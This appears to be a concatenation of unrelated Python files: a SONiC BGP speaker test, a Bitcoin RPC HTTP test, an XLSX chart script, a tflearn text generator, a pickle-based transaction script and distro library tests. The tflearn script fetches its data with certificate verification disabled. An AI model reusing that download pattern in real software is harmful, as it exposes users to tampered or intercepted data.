vlan_if_name = vlan_ipv6_entry['attachto']
nexthops_ipv6 = generate_ips(3, vlan_ipv6_prefix, [IPAddress(vlan_ipv6_address)])
logger.info("Generated nexthops_ipv6: %s" % str(nexthops_ipv6))
logger.info("setup ip/routes in ptf")
for i in [0, 1, 2]:
ptfhost.shell("ip -6 addr add %s dev %s:%d" % (nexthops_ipv6[i], ptf_ports[0], i))
# Issue a ping command to populate entry for next_hop
for nh in nexthops_ipv6:
duthost.shell("ping6 %s -c 3" % nh.ip)
logger.info("setup ip/routes in ptf")
ptfhost.shell("ifconfig %s %s" % (ptf_ports[0], vlan_ips[0]))
ptfhost.shell("ifconfig %s:0 %s" % (ptf_ports[0], speaker_ips[0]))
ptfhost.shell("ifconfig %s:1 %s" % (ptf_ports[0], speaker_ips[1]))
ptfhost.shell("ifconfig %s %s" % (ptf_ports[1], vlan_ips[1]))
ptfhost.shell("ifconfig %s %s" % (ptf_ports[2], vlan_ips[2]))
ptfhost.shell("ip route flush %s/%d" % (lo_addr, lo_addr_prefixlen))
ptfhost.shell("ip route add %s/%d via %s" % (lo_addr, lo_addr_prefixlen, vlan_addr))
logger.info("clear ARP cache on DUT")
duthost.command("sonic-clear arp")
for ip in vlan_ips:
duthost.command("ip route flush %s/32" % ip.ip)
# The ping here is workaround for known issue:
# https://github.com/Azure/SONiC/issues/387 Pre-ARP support for static route config
# When there is no arp entry for next hop, routes learnt from exabgp will not be set down to ASIC
# Also because of issue https://github.com/Azure/sonic-buildimage/issues/5185 ping is done before route addition.
duthost.shell("ping %s -c 3" % ip.ip)
time.sleep(2)
duthost.command("ip route add %s/32 dev %s" % (ip.ip, mg_facts['minigraph_vlan_interfaces'][0]['attachto']))
logger.info("Start exabgp on ptf")
for i in range(0, 3):
local_ip = str(speaker_ips[i].ip)
ptfhost.exabgp(name="bgps%d" % i,
state="started",
local_ip=local_ip,
router_id=local_ip,
peer_ip=lo_addr,
local_asn=bgp_speaker_asn,
peer_asn=mg_facts['minigraph_bgp_asn'],
port=str(port_num[i]))
# check exabgp http_api port is ready
http_ready = True
for i in range(0, 3):
http_ready = wait_tcp_connection(localhost, ptfip, port_num[i])
if not http_ready:
break
logger.info("########### Done setup for bgp speaker testing ###########")
yield ptfip, mg_facts, interface_facts, vlan_ips, nexthops_ipv6, vlan_if_name, speaker_ips, port_num, http_ready
logger.info("########### Teardown for bgp speaker testing ###########")
for i in range(0, 3):
ptfhost.exabgp(name="bgps%d" % i, state="absent")
logger.info("exabgp stopped")
for ip in vlan_ips:
duthost.command("ip route flush %s/32" % ip.ip, module_ignore_errors=True)
duthost.command("sonic-clear arp")
duthost.command("sonic-clear fdb all")
duthost.command("ip -6 neigh flush all")
logger.info("########### Done teardown for bgp speaker testing ###########")
def test_bgp_speaker_bgp_sessions(common_setup_teardown, duthosts, rand_one_dut_hostname):
"""Setup bgp speaker on T0 topology and verify bgp sessions are established
"""
duthost = duthosts[rand_one_dut_hostname]
ptfip, mg_facts, interface_facts, vlan_ips, _, _, speaker_ips, port_num, http_ready = common_setup_teardown
assert http_ready
logger.info("Wait some time to verify that bgp sessions are established")
time.sleep(20)
bgp_facts = duthost.bgp_facts()['ansible_facts']
assert all([v["state"] == "established" for _, v in bgp_facts["bgp_neighbors"].items()]), \
"Not all bgp sessions are established"
assert str(speaker_ips[2].ip) in bgp_facts["bgp_neighbors"], "No bgp session with PTF"
# For dualtor
@pytest.fixture(scope='module')
def vlan_mac(duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
config_facts = duthost.config_facts(host=duthost.hostname, source='running')['ansible_facts']
dut_vlan_mac = None
for vlan in config_facts.get('VLAN', {}).values():
if 'mac' in vlan:
logger.debug('Found VLAN mac')
dut_vlan_mac = vlan['mac']
break
if not dut_vlan_mac:
logger.debug('No VLAN mac, use default router_mac')
dut_vlan_mac = duthost.facts['router_mac']
return dut_vlan_mac
# For dualtor
def get_dut_enabled_ptf_ports(tbinfo, hostname):
dut_index = str(tbinfo['duts_map'][hostname])
ptf_ports = set(tbinfo['topo']['ptf_map'][dut_index].values())
disabled_ports = set()
if dut_index in tbinfo['topo']['ptf_map_disabled']:
disabled_ports = set(tbinfo['topo']['ptf_map_disabled'][dut_index].values())
return ptf_ports - disabled_ports
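# Example (illustrative): if the DUT's ptf_map yields ports {0, 1, 2, 3} and
# ptf_map_disabled yields {2}, the set difference returns {0, 1, 3}.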
# For dualtor
def get_dut_vlan_ptf_ports(mg_facts):
ports = set()
for vlan in mg_facts['minigraph_vlans']:
for member in mg_facts['minigraph_vlans'][vlan]['members']:
ports.add(mg_facts['minigraph_port_indices'][member])
return ports
def is_all_neighbors_learned(duthost, speaker_ips):
bgp_facts = duthost.bgp_facts()['ansible_facts']
for ip in speaker_ips:
        if str(ip.ip) not in bgp_facts['bgp_neighbors']:
            return False
        if bgp_facts['bgp_neighbors'][str(ip.ip)]['accepted prefixes'] != 1:
            return False
return True
def bgp_speaker_announce_routes_common(common_setup_teardown,
tbinfo, duthost, ptfhost, ipv4, ipv6, mtu,
family, prefix, nexthop_ips, vlan_mac):
"""Setup bgp speaker on T0 topology and verify routes advertised by bgp speaker is received by T0 TOR
"""
ptfip, mg_facts, interface_facts, vlan_ips, _, vlan_if_name, speaker_ips, port_num, http_ready = common_setup_teardown
assert http_ready
logger.info("announce route")
peer_range = mg_facts['minigraph_bgp_peers_with_range'][0]['ip_range'][0]
lo_addr = mg_facts['minigraph_lo_interfaces'][0]['addr']
logger.info("Announce ip%s prefixes over ipv4 bgp sessions" % family)
announce_route(ptfip, lo_addr, prefix, nexthop_ips[1].ip, port_num[0])
announce_route(ptfip, lo_addr, prefix, nexthop_ips[2].ip, port_num[1])
announce_route(ptfip, lo_addr, peer_range, vlan_ips[0].ip, port_num[2])
logger.info("Wait some time to make sure routes announced to dynamic bgp neighbors")
assert wait_until(90, 10, 0, is_all_neighbors_learned, duthost, speaker_ips), "Not all dynamic neighbors were learned"
logger.info("Verify nexthops and nexthop interfaces for accepted prefixes of the dynamic neighbors")
    rtinfo = duthost.get_ip_route_info(ipaddress.ip_network(str(prefix)))
nexthops_ip_set = { str(nexthop.ip) for nexthop in nexthop_ips }
assert len(rtinfo["nexthops"]) == 2
    for i in [0, 1]:
        assert str(rtinfo["nexthops"][i][0]) in nexthops_ip_set
        assert rtinfo["nexthops"][i][1] == str(vlan_if_name)
logger.info("Generate route-port map information")
extra_vars = {'announce_prefix': prefix,
'is_backend': 'backend' in tbinfo['topo']['name'],
'minigraph_portchannels': mg_facts['minigraph_portchannels'],
'minigraph_vlans': mg_facts['minigraph_vlans'],
'minigraph_port_indices': mg_facts['minigraph_ptf_indices']}
ptfhost.host.options['variable_manager'].extra_vars.update(extra_vars)
logger.info("extra_vars: %s" % str(ptfhost.host.options['variable_manager'].extra_vars))
ptfhost.template(src="bgp/templates/bgp_speaker_route.j2", dest="/root/bgp_speaker_route_%s.txt" % family)
# For fib PTF testing, including dualtor
ptf_test_port_map = {}
enabled_ptf_ports = get_dut_enabled_ptf_ports(tbinfo, duthost.hostname)
vlan_ptf_ports = get_dut_vlan_ptf_ports(mg_facts)
logger.debug('enabled_ptf_ports={}, vlan_ptf_ports={}, vlan_mac={}'\
.format(enabled_ptf_ports, vlan_ptf_ports, vlan_mac))
for port in enabled_ptf_ports:
if port in vlan_ptf_ports:
target_mac = vlan_mac
else:
target_mac = duthost.facts['router_mac']
ptf_test_port_map[str(port)] = {
'target_dut': 0,
'target_mac': target_mac
}
ptfhost.copy(content=json.dumps(ptf_test_port_map), dest=PTF_TEST_PORT_MAP)
logger.info("run ptf test")
ptf_runner(ptfhost,
"ptftests",
"fib_test.FibTest",
platform_dir="ptftests",
params={"router_macs": [duthost.facts['router_mac']],
"ptf_test_port_map": PTF_TEST_PORT_MAP,
"fib_info_files": ["/root/bgp_speaker_route_%s.txt" % family],
"ipv4": ipv4,
"ipv6": ipv6,
"testbed_mtu": mtu,
"test_balancing": False},
log_file="/tmp/bgp_speaker_test.FibTest.log",
socket_recv_size=16384)
logger.info("Withdraw routes")
withdraw_route(ptfip, lo_addr, prefix, nexthop_ips[1].ip, port_num[0])
withdraw_route(ptfip, lo_addr, prefix, nexthop_ips[2].ip, port_num[1])
withdraw_route(ptfip, lo_addr, peer_range, vlan_ips[0].ip, port_num[2])
logger.info("Nexthop ip%s tests are done" % family)
@pytest.mark.parametrize("ipv4, ipv6, mtu", [pytest.param(True, False, 1514)])
def test_bgp_speaker_announce_routes(common_setup_teardown, tbinfo, duthosts, rand_one_dut_hostname, ptfhost, ipv4, ipv6, mtu, vlan_mac):
"""Setup bgp speaker on T0 topology and verify routes advertised by bgp speaker is received by T0 TOR
"""
duthost = duthosts[rand_one_dut_hostname]
nexthops = common_setup_teardown[3]
bgp_speaker_announce_routes_common(common_setup_teardown, tbinfo, duthost, ptfhost, ipv4, ipv6, mtu, "v4", "10.10.10.0/26", nexthops, vlan_mac)
@pytest.mark.parametrize("ipv4, ipv6, mtu", [pytest.param(False, True, 1514)])
def test_bgp_speaker_announce_routes_v6(common_setup_teardown, tbinfo, duthosts, rand_one_dut_hostname, ptfhost, ipv4, ipv6, mtu, vlan_mac):
"""Setup bgp speaker on T0 topology and verify routes advertised by bgp speaker is received by T0 TOR
"""
duthost = duthosts[rand_one_dut_hostname]
nexthops = common_setup_teardown[4]
bgp_speaker_announce_routes_common(common_setup_teardown, tbinfo, duthost, ptfhost, ipv4, ipv6, mtu, "v6", "fc00:10::/64", nexthops, vlan_mac)
|
py | b40b393a5515147a3657cb132d8d7b9541df049e | #!/usr/bin/env python3
# Copyright (c) 2014-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the RPC HTTP basics."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import http.client
import urllib.parse
class HTTPBasicsTest (BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 3
def setup_network(self):
self.setup_nodes()
def run_test(self):
#################################################
# lowlevel check for http persistent connection #
#################################################
url = urllib.parse.urlparse(self.nodes[0].url)
authpair = url.username + ':' + url.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1) #must also response with a correct json-rpc message
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
conn.close()
#same should be if we add keep-alive because this should be the std. behaviour
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection": "keep-alive"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1) #must also response with a correct json-rpc message
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
conn.close()
#now do the same with "Connection: close"
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection":"close"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock==None) #now the connection must be closed after the response
#node1 (2nd node) is running with disabled keep-alive option
urlNode1 = urllib.parse.urlparse(self.nodes[1].url)
authpair = urlNode1.username + ':' + urlNode1.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode1.hostname, urlNode1.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
#node2 (third node) is running with standard keep-alive parameters which means keep-alive is on
urlNode2 = urllib.parse.urlparse(self.nodes[2].url)
authpair = urlNode2.username + ':' + urlNode2.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
        assert(conn.sock!=None) #connection must still be open because fivegd should use keep-alive by default
# Check excessive request size
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*1000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.NOT_FOUND)
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*10000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.BAD_REQUEST)
if __name__ == '__main__':
HTTPBasicsTest ().main ()
|
py | b40b39b396a9d2a075ae6cb3d8e69c0742079f3c | from __future__ import print_function
import argparse
from collections import Counter
from datetime import datetime
import os
import sys
from utility import utilcsv
try:
import xlsxwriter
except ImportError:
print("[-] Install required third-party module xlsxwriter")
sys.exit(1)
"""
MIT License
Copyright (c) 2017 Chapin Bryce, Preston Miller
Please share comments and questions at:
https://github.com/PythonForensics/PythonForensicsCookbook
or email [email protected]
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
__authors__ = ["Chapin Bryce", "Preston Miller"]
__date__ = 20170815
__description__ = "Create charts in XLSX files"
def main(output_directory):
print("[+] Reading in sample data set")
# Skip first row of headers
data = utilcsv.csv_reader("redacted_sample_event_log.csv")[1:]
xlsx_writer(data, output_directory)
def xlsx_writer(data, output_directory):
print("[+] Writing output.xlsx file to {}".format(output_directory))
workbook = xlsxwriter.Workbook(
os.path.join(output_directory, "output.xlsx"))
dashboard = workbook.add_worksheet("Dashboard")
data_sheet = workbook.add_worksheet("Data")
title_format = workbook.add_format({
'bold': True, 'font_color': 'white', 'bg_color': 'black',
'font_size': 30, 'font_name': 'Calibri', 'align': 'center'
})
date_format = workbook.add_format(
{'num_format': 'mm/dd/yy hh:mm:ss AM/PM'})
# Write CSV data to Data worksheet
for i, record in enumerate(data):
data_sheet.write_number(i, 0, int(record[0]))
data_sheet.write(i, 1, record[1])
data_sheet.write(i, 2, record[2])
dt = datetime.strptime(record[3], "%m/%d/%Y %H:%M:%S %p")
data_sheet.write_datetime(i, 3, dt, date_format)
data_sheet.write_number(i, 4, int(record[4]))
data_sheet.write(i, 5, record[5])
data_sheet.write_number(i, 6, int(record[6]))
data_sheet.write(i, 7, record[7])
data_length = len(data) + 1
data_sheet.add_table(
"A1:H{}".format(data_length),
{"columns": [
{"header": "Index"},
{"header": "File Name"},
{"header": "Computer Name"},
{"header": "Written Date"},
{"header": "Event Level"},
{"header": "Event Source"},
{"header": "Event ID"},
{"header": "File Path"}
]}
)
event_ids = Counter([x[6] for x in data])
dashboard.merge_range('A1:Q1', 'Event Log Dashboard', title_format)
for i, record in enumerate(event_ids):
dashboard.write(100 + i, 0, record)
dashboard.write(100 + i, 1, event_ids[record])
dashboard.add_table("A100:B{}".format(
100 + len(event_ids)),
{"columns": [{"header": "Event ID"}, {"header": "Occurrence"}]}
)
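    # Note on indices (explanatory): write() above takes 0-based row indices,
    # so row index 100 lands on spreadsheet row 101. The table declared at
    # "A100" (A1 notation) therefore places its header on spreadsheet row 100
    # with the data on rows 101..100+N, which is why the chart series below
    # reference the ranges $A$101:$A$(100+N) and $B$101:$B$(100+N).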
event_chart = workbook.add_chart({'type': 'bar'})
event_chart.set_title({'name': 'Event ID Breakdown'})
event_chart.set_size({'x_scale': 2, 'y_scale': 5})
event_chart.add_series(
{'categories': '=Dashboard!$A$101:$A${}'.format(
100 + len(event_ids)),
'values': '=Dashboard!$B$101:$B${}'.format(
100 + len(event_ids))})
dashboard.insert_chart('C5', event_chart)
workbook.close()
if __name__ == "__main__":
# Command-line Argument Parser
parser = argparse.ArgumentParser(
description=__description__,
epilog="Developed by {} on {}".format(
", ".join(__authors__), __date__)
)
parser.add_argument("OUTPUT_DIR", help="Desired Output Path")
args = parser.parse_args()
if not os.path.exists(args.OUTPUT_DIR):
os.makedirs(args.OUTPUT_DIR)
main(args.OUTPUT_DIR)
|
py | b40b39be10941ce6bb65fac566249b9baf7fa8fd | from __future__ import absolute_import, division, print_function
import os
from six import moves
import ssl
import tflearn
from tflearn.data_utils import *
path = "US_Cities.txt"
if not os.path.isfile(path):
context = ssl._create_unverified_context()
moves.urllib.request.urlretrieve("https://raw.githubusercontent.com/tflearn/tflearn.github.io/master/resources/US_Cities.txt", path, context=context)
maxlen = 20
X, Y, char_idx = \
textfile_to_semi_redundant_sequences(path, seq_maxlen=maxlen, redun_step=3)
g = tflearn.input_data(shape=[None, maxlen, len(char_idx)])
g = tflearn.lstm(g, 512, return_seq=True)
g = tflearn.dropout(g, 0.5)
g = tflearn.lstm(g, 512)
g = tflearn.dropout(g, 0.5)
g = tflearn.fully_connected(g, len(char_idx), activation='softmax')
g = tflearn.regression(g, optimizer='adam', loss='categorical_crossentropy',
learning_rate=0.001)
m = tflearn.SequenceGenerator(g, dictionary=char_idx,
seq_maxlen=maxlen,
clip_gradients=5.0,
checkpoint_path='model_us_cities')
# Training
for i in range(40):
seed = random_sequence_from_textfile(path, maxlen)
m.fit(X, Y, validation_set=0.1, batch_size=128,
n_epoch=1, run_id='us_cities')
print("-- TESTING...")
print("-- Test with temperature of 1.2 --")
print(m.generate(30, temperature=1.2, seq_seed=seed))
print("-- Test with temperature of 1.0 --")
print(m.generate(30, temperature=1.0, seq_seed=seed))
print("-- Test with temperature of 0.5 --")
print(m.generate(30, temperature=0.5, seq_seed=seed))
|
py | b40b3a93fe2d044420efe32008b98c9c75cbcd71 | #import pickle
#import sys
#loaded_model_d = pickle.load(open('default_model.mdl', 'rb'))
#loaded_model_nd = pickle.load(open('not_default_model.mdl', 'rb'))
#pos_prob_d = loaded_model_d.predict(mdata)
#pos_prob_nd = loaded_model_nd.predict(mdata)
#print(pos_prob_nd > pos_prob_d)
import sys, getopt, pickle
import numpy as np
def main(argv):
user_id = ''
transaction_value = ''
try:
opts, args = getopt.getopt(argv,"hu:v:",["user_id=","transaction_value="])
except getopt.GetoptError:
print('transaction_approval_service.py -u <user_id> -v <transaction_value>')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print('Usage:')
print('transaction_approval_service.py -u <user_id> -v <transaction_value>')
sys.exit()
elif opt in ("-u", "--user_id"):
user_id = arg
elif opt in ("-v", "--transaction_value"):
transaction_value = arg
loaded_model_d = pickle.load(open('default_model.mdl', 'rb'))
loaded_model_nd = pickle.load(open('not_default_model.mdl', 'rb'))
    recovered_data = np.loadtxt('test.out', delimiter=',')
    pattern = recovered_data[np.random.randint(len(recovered_data), size=1), :]
pos_prob_nd = loaded_model_nd.predict(pattern)
pos_prob_d = loaded_model_d.predict(pattern)
result = pos_prob_nd > pos_prob_d
print(result[0])
if __name__ == "__main__":
main(sys.argv[1:]) |
py | b40b3aa524e3fde7ca05420bd69003e3205b2662 | # Copyright 2015,2016 Nir Cohen
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ast
import io
import json
import os
import subprocess
import sys
from types import FunctionType
from typing import Any, Dict, List, NoReturn, Optional
import pytest
BASE = os.path.abspath(os.path.dirname(__file__))
RESOURCES = os.path.join(BASE, "resources")
DISTROS_DIR = os.path.join(RESOURCES, "distros")
TESTDISTROS = os.path.join(RESOURCES, "testdistros")
SPECIAL = os.path.join(RESOURCES, "special")
DISTROS = [dist for dist in os.listdir(DISTROS_DIR) if dist != "__shared__"]
IS_LINUX = sys.platform.startswith("linux")
if IS_LINUX:
from distro import distro
RELATIVE_UNIXCONFDIR = distro._UNIXCONFDIR[1:]
RELATIVE_UNIXUSRLIBDIR = distro._UNIXUSRLIBDIR[1:]
MODULE_DISTRO = distro._distro
class TestNonLinuxPlatform:
def test_cant_use_on_windows(self) -> None:
try:
import distro # NOQA
except ImportError as ex:
assert "Unsupported platform" in str(ex)
@pytest.mark.skipif(not IS_LINUX, reason="Irrelevant on non-linux")
class TestCli:
def _parse(self, command: str) -> None:
sys.argv = command.split()
distro.main()
def _run(self, command: List[str]) -> str:
r = subprocess.run(
command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
encoding="utf-8",
)
return r.stdout
def test_cli_for_coverage_yuch(self) -> None:
self._parse("distro")
self._parse("distro -j")
def test_cli_can_parse_root_dir_args(self) -> None:
root_dir = os.path.join(RESOURCES, "cli", "fedora30")
self._parse(f"distro --root-dir {root_dir}")
def test_cli(self) -> None:
command = [sys.executable, "-m", "distro"]
desired_output = f"Name: {distro.name(pretty=True)}"
distro_version = distro.version(pretty=True)
distro_codename = distro.codename()
desired_output += f"\nVersion: {distro_version}"
desired_output += f"\nCodename: {distro_codename}"
desired_output += "\n"
assert self._run(command) == desired_output
def test_cli_json(self) -> None:
command = [sys.executable, "-m", "distro", "-j"]
assert ast.literal_eval(self._run(command)) == distro.info()
def test_cli_with_root_dir(self) -> None:
root_dir = os.path.join(RESOURCES, "cli", "fedora30")
command = [sys.executable, "-m", "distro", "--root-dir", root_dir]
desired_output = "Name: Fedora 30 (Thirty)\nVersion: 30\nCodename: \n"
assert desired_output == self._run(command)
def test_cli_with_root_dir_as_json(self) -> None:
root_dir = os.path.join(RESOURCES, "cli", "fedora30")
command = [sys.executable, "-m", "distro", "-j", "--root-dir", root_dir]
desired_output = {
"codename": "",
"id": "fedora",
"like": "",
"version": "30",
"version_parts": {"build_number": "", "major": "30", "minor": ""},
}
results = json.loads(self._run(command))
assert desired_output == results
@pytest.mark.skipif(not IS_LINUX, reason="Irrelevant on non-linux")
class DistroTestCase:
"""A base class for any testcase classes that test the distributions
represented in the `DISTROS` subtree.
"""
def setup_method(self, test_method: FunctionType) -> None:
# The environment stays the same across all testcases, so we
# save and restore the PATH env var in each test case that
# changes it:
self._saved_path = os.environ["PATH"]
self._saved_UNIXCONFDIR = distro._UNIXCONFDIR
self._saved_UNIXUSRLIBDIR = distro._UNIXUSRLIBDIR
def teardown_method(self, test_method: FunctionType) -> None:
os.environ["PATH"] = self._saved_path
distro._UNIXCONFDIR = self._saved_UNIXCONFDIR
distro._UNIXUSRLIBDIR = self._saved_UNIXUSRLIBDIR
def _setup_for_distro(self, distro_root: str) -> None:
distro_bin = os.path.join(distro_root, "bin")
# We don't want to pick up a possibly present lsb_release in the
# distro that runs this test, so we use a PATH with only one entry:
os.environ["PATH"] = distro_bin
distro._UNIXCONFDIR = os.path.join(distro_root, RELATIVE_UNIXCONFDIR)
distro._UNIXUSRLIBDIR = os.path.join(distro_root, RELATIVE_UNIXUSRLIBDIR)
@pytest.mark.skipif(not IS_LINUX, reason="Irrelevant on non-linux")
class TestOSRelease:
def setup_method(self, test_method: FunctionType) -> None:
dist = test_method.__name__.split("_")[1]
os_release = os.path.join(DISTROS_DIR, dist, "etc", "os-release")
self.distro = distro.LinuxDistribution(
include_lsb=False,
os_release_file=os_release,
distro_release_file="path-to-non-existing-file",
)
def _test_outcome(self, outcome: Dict[str, str]) -> None:
assert self.distro.id() == outcome.get("id", "")
assert self.distro.name() == outcome.get("name", "")
assert self.distro.name(pretty=True) == outcome.get("pretty_name", "")
assert self.distro.version() == outcome.get("version", "")
assert self.distro.version(pretty=True) == outcome.get("pretty_version", "")
assert self.distro.version(best=True) == outcome.get("best_version", "")
assert self.distro.like() == outcome.get("like", "")
assert self.distro.codename() == outcome.get("codename", "")
def test_arch_os_release(self) -> None:
desired_outcome = {
"id": "arch",
"name": "Arch Linux",
"pretty_name": "Arch Linux",
}
self._test_outcome(desired_outcome)
def test_kali_os_release(self) -> None:
desired_outcome = {
"id": "kali",
"name": "Kali GNU/Linux",
"pretty_name": "Kali GNU/Linux Rolling",
"version": "2017.1",
"pretty_version": "2017.1",
"best_version": "2017.1",
"like": "debian",
}
self._test_outcome(desired_outcome)
def test_centos7_os_release(self) -> None:
desired_outcome = {
"id": "centos",
"name": "CentOS Linux",
"pretty_name": "CentOS Linux 7 (Core)",
"version": "7",
"pretty_version": "7 (Core)",
"best_version": "7",
"like": "rhel fedora",
"codename": "Core",
}
self._test_outcome(desired_outcome)
def test_coreos_os_release(self) -> None:
desired_outcome = {
"id": "coreos",
"name": "CoreOS",
"pretty_name": "CoreOS 899.15.0",
"version": "899.15.0",
"pretty_version": "899.15.0",
"best_version": "899.15.0",
}
self._test_outcome(desired_outcome)
def test_debian8_os_release(self) -> None:
desired_outcome = {
"id": "debian",
"name": "Debian GNU/Linux",
"pretty_name": "Debian GNU/Linux 8 (jessie)",
"version": "8",
"pretty_version": "8 (jessie)",
"best_version": "8",
"codename": "jessie",
}
self._test_outcome(desired_outcome)
def test_fedora19_os_release(self) -> None:
desired_outcome = {
"id": "fedora",
"name": "Fedora",
"pretty_name": "Fedora 19 (Schrödinger’s Cat)",
"version": "19",
"pretty_version": "19 (Schrödinger’s Cat)",
"best_version": "19",
"codename": "Schrödinger’s Cat",
}
self._test_outcome(desired_outcome)
def test_fedora23_os_release(self) -> None:
desired_outcome = {
"id": "fedora",
"name": "Fedora",
"pretty_name": "Fedora 23 (Twenty Three)",
"version": "23",
"pretty_version": "23 (Twenty Three)",
"best_version": "23",
"codename": "Twenty Three",
}
self._test_outcome(desired_outcome)
def test_fedora30_os_release(self) -> None:
# Fedora 21 and above no longer have code names but the metadata in
# os-release was only changed in a detectable way in Fedora 30+. The
# piece in parenthesis in the pretty_name field contains the VARIANT
# and differs depending on the variant which was installed.
desired_outcome = {
"id": "fedora",
"name": "Fedora",
"pretty_name": "Fedora 30 (Thirty)",
"version": "30",
"pretty_version": "30",
"best_version": "30",
"codename": "",
}
self._test_outcome(desired_outcome)
def test_kvmibm1_os_release(self) -> None:
desired_outcome = {
"id": "kvmibm",
"name": "KVM for IBM z Systems",
"pretty_name": "KVM for IBM z Systems 1.1.1 (Z)",
"version": "1.1.1",
"pretty_version": "1.1.1 (Z)",
"best_version": "1.1.1",
"like": "rhel fedora",
"codename": "Z",
}
self._test_outcome(desired_outcome)
def test_linuxmint17_os_release(self) -> None:
# Note: LinuxMint 17 actually *does* have Ubuntu 14.04 data in its
# os-release file. See discussion in GitHub issue #78.
desired_outcome = {
"id": "ubuntu",
"name": "Ubuntu",
"pretty_name": "Ubuntu 14.04.3 LTS",
"version": "14.04",
"pretty_version": "14.04 (Trusty Tahr)",
"best_version": "14.04.3",
"like": "debian",
"codename": "Trusty Tahr",
}
self._test_outcome(desired_outcome)
def test_mageia5_os_release(self) -> None:
desired_outcome = {
"id": "mageia",
"name": "Mageia",
"pretty_name": "Mageia 5",
"version": "5",
"pretty_version": "5",
"best_version": "5",
"like": "mandriva fedora",
}
self._test_outcome(desired_outcome)
def test_manjaro1512_os_release(self) -> None:
self._test_outcome(
{"id": "manjaro", "name": "Manjaro Linux", "pretty_name": "Manjaro Linux"}
)
def test_opensuse42_os_release(self) -> None:
desired_outcome = {
"id": "opensuse",
"name": "openSUSE Leap",
"pretty_name": "openSUSE Leap 42.1 (x86_64)",
"version": "42.1",
"pretty_version": "42.1",
"best_version": "42.1",
"like": "suse",
}
self._test_outcome(desired_outcome)
def test_opensuse15_os_release(self) -> None:
desired_outcome = {
"id": "opensuse",
"name": "openSUSE Leap",
"pretty_name": "openSUSE Leap 15.2",
"version": "15.2",
"pretty_version": "15.2",
"best_version": "15.2",
"like": "suse opensuse",
}
self._test_outcome(desired_outcome)
def test_raspbian7_os_release(self) -> None:
desired_outcome = {
"id": "raspbian",
"name": "Raspbian GNU/Linux",
"pretty_name": "Raspbian GNU/Linux 7 (wheezy)",
"version": "7",
"pretty_version": "7 (wheezy)",
"best_version": "7",
"like": "debian",
"codename": "wheezy",
}
self._test_outcome(desired_outcome)
def test_raspbian8_os_release(self) -> None:
desired_outcome = {
"id": "raspbian",
"name": "Raspbian GNU/Linux",
"pretty_name": "Raspbian GNU/Linux 8 (jessie)",
"version": "8",
"pretty_version": "8 (jessie)",
"best_version": "8",
"like": "debian",
"codename": "jessie",
}
self._test_outcome(desired_outcome)
def test_rhel7_os_release(self) -> None:
desired_outcome = {
"id": "rhel",
"name": "Red Hat Enterprise Linux Server",
"pretty_name": "Red Hat Enterprise Linux Server 7.0 (Maipo)",
"version": "7.0",
"pretty_version": "7.0 (Maipo)",
